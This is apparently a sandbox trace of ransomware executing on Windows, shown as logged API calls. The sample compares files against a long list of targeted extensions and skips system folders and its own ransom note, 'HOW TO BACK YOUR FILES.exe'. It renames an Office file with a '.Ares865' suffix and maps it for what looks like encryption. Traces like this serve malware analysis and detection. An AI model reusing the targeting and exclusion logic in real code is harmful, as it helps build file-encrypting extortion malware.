lstrlenW (lpString="maq") returned 3 [0088.157] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0088.157] lstrlenW (lpString="mar") returned 3 [0088.157] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0088.157] lstrlenW (lpString="marshal") returned 7 [0088.157] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0088.157] lstrlenW (lpString="mas") returned 3 [0088.157] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0088.157] lstrlenW (lpString="mav") returned 3 [0088.157] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0088.157] lstrlenW (lpString="maw") returned 3 [0088.157] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0088.157] lstrlenW (lpString="mdbhtml") returned 7 [0088.157] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0088.157] lstrlenW (lpString="mdn") returned 3 [0088.158] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0088.158] lstrlenW (lpString="mdt") returned 3 [0088.158] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0088.158] lstrlenW (lpString="mfd") returned 3 [0088.158] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0088.158] lstrlenW (lpString="mpd") returned 3 [0088.158] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0088.158] lstrlenW (lpString="mrg") returned 3 [0088.158] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0088.158] lstrlenW (lpString="mud") returned 3 [0088.158] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0088.158] lstrlenW (lpString="mwb") returned 3 [0088.158] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0088.158] lstrlenW (lpString="myd") returned 3 [0088.158] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0088.158] lstrlenW (lpString="ndf") returned 3 [0088.158] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0088.158] lstrlenW (lpString="nnt") returned 3 [0088.158] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0088.158] lstrlenW (lpString="nrmlib") returned 6 [0088.158] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0088.158] lstrlenW (lpString="ns2") returned 3 [0088.158] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0088.158] lstrlenW (lpString="ns3") returned 3 [0088.158] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0088.158] lstrlenW (lpString="ns4") returned 3 [0088.158] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0088.158] lstrlenW (lpString="nsf") returned 3 [0088.158] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0088.158] lstrlenW (lpString="nv") returned 2 [0088.158] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0088.158] lstrlenW (lpString="nv2") returned 3 [0088.158] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0088.158] lstrlenW (lpString="nwdb") returned 4 [0088.158] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0088.158] lstrlenW (lpString="nyf") returned 3 [0088.158] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0088.158] lstrlenW (lpString="odb") returned 3 [0088.159] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.159] lstrlenW (lpString="odb") returned 3 [0088.159] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.159] lstrlenW (lpString="oqy") returned 3 [0088.159] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0088.159] lstrlenW (lpString="ora") returned 3 [0088.159] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0088.159] lstrlenW (lpString="orx") returned 3 [0088.159] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0088.159] lstrlenW (lpString="owc") returned 3 [0088.159] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0088.159] lstrlenW (lpString="p96") returned 3 [0088.159] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0088.159] lstrlenW (lpString="p97") returned 3 [0088.159] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0088.159] lstrlenW (lpString="pan") returned 3 [0088.159] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0088.159] lstrlenW (lpString="pdb") returned 3 [0088.159] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0088.159] lstrlenW (lpString="pdm") returned 3 [0088.159] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0088.159] lstrlenW (lpString="pnz") returned 3 [0088.159] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0088.159] lstrlenW (lpString="qry") returned 3 [0088.159] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0088.159] lstrlenW (lpString="qvd") returned 3 [0088.159] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0088.159] lstrlenW (lpString="rbf") returned 3 [0088.159] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0088.159] lstrlenW (lpString="rctd") returned 4 [0088.159] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0088.159] lstrlenW (lpString="rod") returned 3 [0088.159] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0088.159] lstrlenW (lpString="rodx") returned 4 [0088.159] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0088.159] lstrlenW (lpString="rpd") returned 3 [0088.159] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0088.159] lstrlenW (lpString="rsd") returned 3 [0088.160] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0088.160] lstrlenW (lpString="sas7bdat") returned 8 [0088.160] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0088.160] lstrlenW (lpString="sbf") returned 3 [0088.160] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0088.160] lstrlenW (lpString="scx") returned 3 [0088.160] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0088.160] lstrlenW (lpString="sdb") returned 3 [0088.160] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0088.160] lstrlenW (lpString="sdc") returned 3 [0088.160] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0088.160] lstrlenW (lpString="sdf") returned 3 [0088.160] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0088.160] lstrlenW (lpString="sis") returned 3 [0088.160] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0088.160] lstrlenW (lpString="spq") returned 3 [0088.160] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0088.160] lstrlenW (lpString="te") returned 2 [0088.160] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0088.160] lstrlenW (lpString="teacher") returned 7 [0088.160] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0088.160] lstrlenW (lpString="tmd") returned 3 [0088.160] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0088.160] lstrlenW (lpString="tps") returned 3 [0088.160] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0088.160] lstrlenW (lpString="trc") returned 3 [0088.160] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.160] lstrlenW (lpString="trc") returned 3 [0088.160] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.160] lstrlenW (lpString="trm") returned 3 [0088.160] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0088.160] lstrlenW (lpString="udb") returned 3 [0088.160] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0088.160] lstrlenW (lpString="udl") returned 3 [0088.160] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0088.160] lstrlenW (lpString="usr") returned 3 [0088.160] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0088.160] lstrlenW (lpString="v12") returned 3 [0088.160] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0088.161] lstrlenW (lpString="vis") returned 3 [0088.161] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0088.161] lstrlenW (lpString="vpd") returned 3 [0088.161] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0088.161] lstrlenW (lpString="vvv") returned 3 [0088.161] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0088.161] lstrlenW (lpString="wdb") returned 3 [0088.161] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0088.161] lstrlenW (lpString="wmdb") returned 4 [0088.161] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0088.161] lstrlenW (lpString="wrk") returned 3 [0088.161] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0088.161] lstrlenW (lpString="xdb") returned 3 [0088.161] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0088.161] lstrlenW (lpString="xld") returned 3 [0088.161] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0088.161] lstrlenW (lpString="xmlff") returned 5 [0088.161] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0088.161] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll.Ares865") returned 79 [0088.161] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0088.162] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0088.162] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11104) returned 1 [0088.163] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0088.163] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0088.163] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0088.163] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0088.164] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0088.164] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.164] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2e60, lpName=0x0) returned 0x15c [0088.166] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2e60) returned 0x190000 [0088.168] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0088.169] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0088.169] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0088.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0088.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0088.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0088.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0088.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0088.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0088.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0088.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0088.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0088.169] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0088.169] CloseHandle (hObject=0x15c) returned 1 [0088.169] CloseHandle (hObject=0x118) returned 1 [0088.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0088.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0088.170] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0088.170] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cef6000, ftCreationTime.dwHighDateTime=0x1cac803, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7cef6000, ftLastWriteTime.dwHighDateTime=0x1cac803, nFileSizeHigh=0x0, nFileSizeLow=0xcd60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PPINTL.DLL.trx_dll", cAlternateFileName="PPINTL~1.TRX")) returned 1 [0088.170] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0088.170] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0088.170] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2=".") returned 1 [0088.170] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="..") returned 1 [0088.170] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="windows") returned -1 [0088.170] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="bootmgr") returned 1 [0088.170] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="temp") returned -1 [0088.170] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="pagefile.sys") returned 1 [0088.170] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="boot") returned 1 [0088.170] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="ids.txt") returned 1 [0088.170] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0088.170] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="perflogs") returned 1 [0088.170] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="MSBuild") returned 1 [0088.170] lstrlenW (lpString="PPINTL.DLL.trx_dll") returned 18 [0088.170] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll") returned 71 [0088.170] lstrcpyW (in: lpString1=0x2cce468, lpString2="PPINTL.DLL.trx_dll" | out: lpString1="PPINTL.DLL.trx_dll") returned="PPINTL.DLL.trx_dll" [0088.170] lstrlenW (lpString="PPINTL.DLL.trx_dll") returned 18 [0088.170] lstrlenW (lpString="Ares865") returned 7 [0088.170] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0088.170] lstrlenW (lpString=".dll") returned 4 [0088.170] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2=".dll") returned 1 [0088.170] lstrlenW (lpString=".lnk") returned 4 [0088.170] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2=".lnk") returned 1 [0088.170] lstrlenW (lpString=".ini") returned 4 [0088.170] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2=".ini") returned 1 [0088.170] lstrlenW (lpString=".sys") returned 4 [0088.170] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2=".sys") returned 1 [0088.170] lstrlenW (lpString="PPINTL.DLL.trx_dll") returned 18 [0088.171] lstrlenW (lpString="bak") returned 3 [0088.171] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0088.171] lstrlenW (lpString="ba_") returned 3 [0088.171] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0088.171] lstrlenW (lpString="dbb") returned 3 [0088.171] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0088.171] lstrlenW (lpString="vmdk") returned 4 [0088.171] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0088.171] lstrlenW (lpString="rar") returned 3 [0088.171] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0088.171] lstrlenW (lpString="zip") returned 3 [0088.171] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0088.171] lstrlenW (lpString="tgz") returned 3 [0088.171] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0088.171] lstrlenW (lpString="vbox") returned 4 [0088.171] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0088.171] lstrlenW (lpString="vdi") returned 3 [0088.171] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0088.171] lstrlenW (lpString="vhd") returned 3 [0088.171] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0088.171] lstrlenW (lpString="vhdx") returned 4 [0088.171] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0088.171] lstrlenW (lpString="avhd") returned 4 [0088.171] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0088.171] lstrlenW (lpString="db") returned 2 [0088.171] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0088.171] lstrlenW (lpString="db2") returned 3 [0088.171] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0088.171] lstrlenW (lpString="db3") returned 3 [0088.171] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0088.171] lstrlenW (lpString="dbf") returned 3 [0088.171] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0088.171] lstrlenW (lpString="mdf") returned 3 [0088.171] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0088.171] lstrlenW (lpString="mdb") returned 3 [0088.171] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0088.171] lstrlenW (lpString="sql") returned 3 [0088.171] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0088.172] lstrlenW (lpString="sqlite") returned 6 [0088.172] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0088.172] lstrlenW (lpString="sqlite3") returned 7 [0088.172] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0088.172] lstrlenW (lpString="sqlitedb") returned 8 [0088.172] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0088.172] lstrlenW (lpString="xml") returned 3 [0088.172] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0088.172] lstrlenW (lpString="$er") returned 3 [0088.172] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0088.172] lstrlenW (lpString="4dd") returned 3 [0088.172] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0088.172] lstrlenW (lpString="4dl") returned 3 [0088.172] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0088.172] lstrlenW (lpString="^^^") returned 3 [0088.172] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0088.172] lstrlenW (lpString="abs") returned 3 [0088.172] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0088.172] lstrlenW (lpString="abx") returned 3 [0088.172] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0088.172] lstrlenW (lpString="accdb") returned 5 [0088.172] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0088.172] lstrlenW (lpString="accdc") returned 5 [0088.172] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0088.172] lstrlenW (lpString="accde") returned 5 [0088.172] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0088.172] lstrlenW (lpString="accdr") returned 5 [0088.172] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0088.172] lstrlenW (lpString="accdt") returned 5 [0088.172] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0088.172] lstrlenW (lpString="accdw") returned 5 [0088.172] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0088.172] lstrlenW (lpString="accft") returned 5 [0088.172] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0088.172] lstrlenW (lpString="adb") returned 3 [0088.172] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.172] lstrlenW (lpString="adb") returned 3 [0088.172] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.173] lstrlenW (lpString="ade") returned 3 [0088.173] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0088.173] lstrlenW (lpString="adf") returned 3 [0088.173] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0088.173] lstrlenW (lpString="adn") returned 3 [0088.173] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0088.173] lstrlenW (lpString="adp") returned 3 [0088.173] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0088.173] lstrlenW (lpString="alf") returned 3 [0088.173] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0088.173] lstrlenW (lpString="ask") returned 3 [0088.173] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0088.173] lstrlenW (lpString="btr") returned 3 [0088.173] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0088.173] lstrlenW (lpString="cat") returned 3 [0088.173] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0088.173] lstrlenW (lpString="cdb") returned 3 [0088.173] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0088.173] lstrlenW (lpString="ckp") returned 3 [0088.173] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0088.173] lstrlenW (lpString="cma") returned 3 [0088.173] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0088.173] lstrlenW (lpString="cpd") returned 3 [0088.173] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0088.173] lstrlenW (lpString="dacpac") returned 6 [0088.173] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0088.173] lstrlenW (lpString="dad") returned 3 [0088.173] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0088.173] lstrlenW (lpString="dadiagrams") returned 10 [0088.173] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0088.173] lstrlenW (lpString="daschema") returned 8 [0088.173] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0088.173] lstrlenW (lpString="db-journal") returned 10 [0088.173] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0088.173] lstrlenW (lpString="db-shm") returned 6 [0088.173] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0088.173] lstrlenW (lpString="db-wal") returned 6 [0088.173] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0088.173] lstrlenW (lpString="dbc") returned 3 [0088.174] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0088.174] lstrlenW (lpString="dbs") returned 3 [0088.174] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0088.174] lstrlenW (lpString="dbt") returned 3 [0088.174] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0088.174] lstrlenW (lpString="dbv") returned 3 [0088.174] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0088.174] lstrlenW (lpString="dbx") returned 3 [0088.174] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0088.174] lstrlenW (lpString="dcb") returned 3 [0088.174] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0088.174] lstrlenW (lpString="dct") returned 3 [0088.174] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0088.174] lstrlenW (lpString="dcx") returned 3 [0088.174] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0088.174] lstrlenW (lpString="ddl") returned 3 [0088.174] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0088.174] lstrlenW (lpString="dlis") returned 4 [0088.174] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0088.174] lstrlenW (lpString="dp1") returned 3 [0088.174] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0088.174] lstrlenW (lpString="dqy") returned 3 [0088.174] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0088.174] lstrlenW (lpString="dsk") returned 3 [0088.174] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0088.174] lstrlenW (lpString="dsn") returned 3 [0088.174] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0088.174] lstrlenW (lpString="dtsx") returned 4 [0088.174] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0088.174] lstrlenW (lpString="dxl") returned 3 [0088.174] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0088.174] lstrlenW (lpString="eco") returned 3 [0088.174] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0088.174] lstrlenW (lpString="ecx") returned 3 [0088.174] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0088.174] lstrlenW (lpString="edb") returned 3 [0088.174] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0088.174] lstrlenW (lpString="epim") returned 4 [0088.175] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0088.175] lstrlenW (lpString="fcd") returned 3 [0088.175] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0088.175] lstrlenW (lpString="fdb") returned 3 [0088.175] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0088.175] lstrlenW (lpString="fic") returned 3 [0088.175] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0088.175] lstrlenW (lpString="flexolibrary") returned 12 [0088.175] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0088.175] lstrlenW (lpString="fm5") returned 3 [0088.175] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0088.175] lstrlenW (lpString="fmp") returned 3 [0088.175] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0088.175] lstrlenW (lpString="fmp12") returned 5 [0088.175] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0088.175] lstrlenW (lpString="fmpsl") returned 5 [0088.175] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0088.175] lstrlenW (lpString="fol") returned 3 [0088.175] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0088.175] lstrlenW (lpString="fp3") returned 3 [0088.175] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0088.175] lstrlenW (lpString="fp4") returned 3 [0088.175] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0088.175] lstrlenW (lpString="fp5") returned 3 [0088.175] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0088.175] lstrlenW (lpString="fp7") returned 3 [0088.175] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0088.175] lstrlenW (lpString="fpt") returned 3 [0088.175] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0088.175] lstrlenW (lpString="frm") returned 3 [0088.175] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0088.175] lstrlenW (lpString="gdb") returned 3 [0088.175] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.175] lstrlenW (lpString="gdb") returned 3 [0088.175] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.175] lstrlenW (lpString="grdb") returned 4 [0088.175] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0088.175] lstrlenW (lpString="gwi") returned 3 [0088.176] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0088.176] lstrlenW (lpString="hdb") returned 3 [0088.176] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0088.176] lstrlenW (lpString="his") returned 3 [0088.176] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0088.176] lstrlenW (lpString="ib") returned 2 [0088.176] lstrcmpiW (lpString1="ll", lpString2="ib") returned 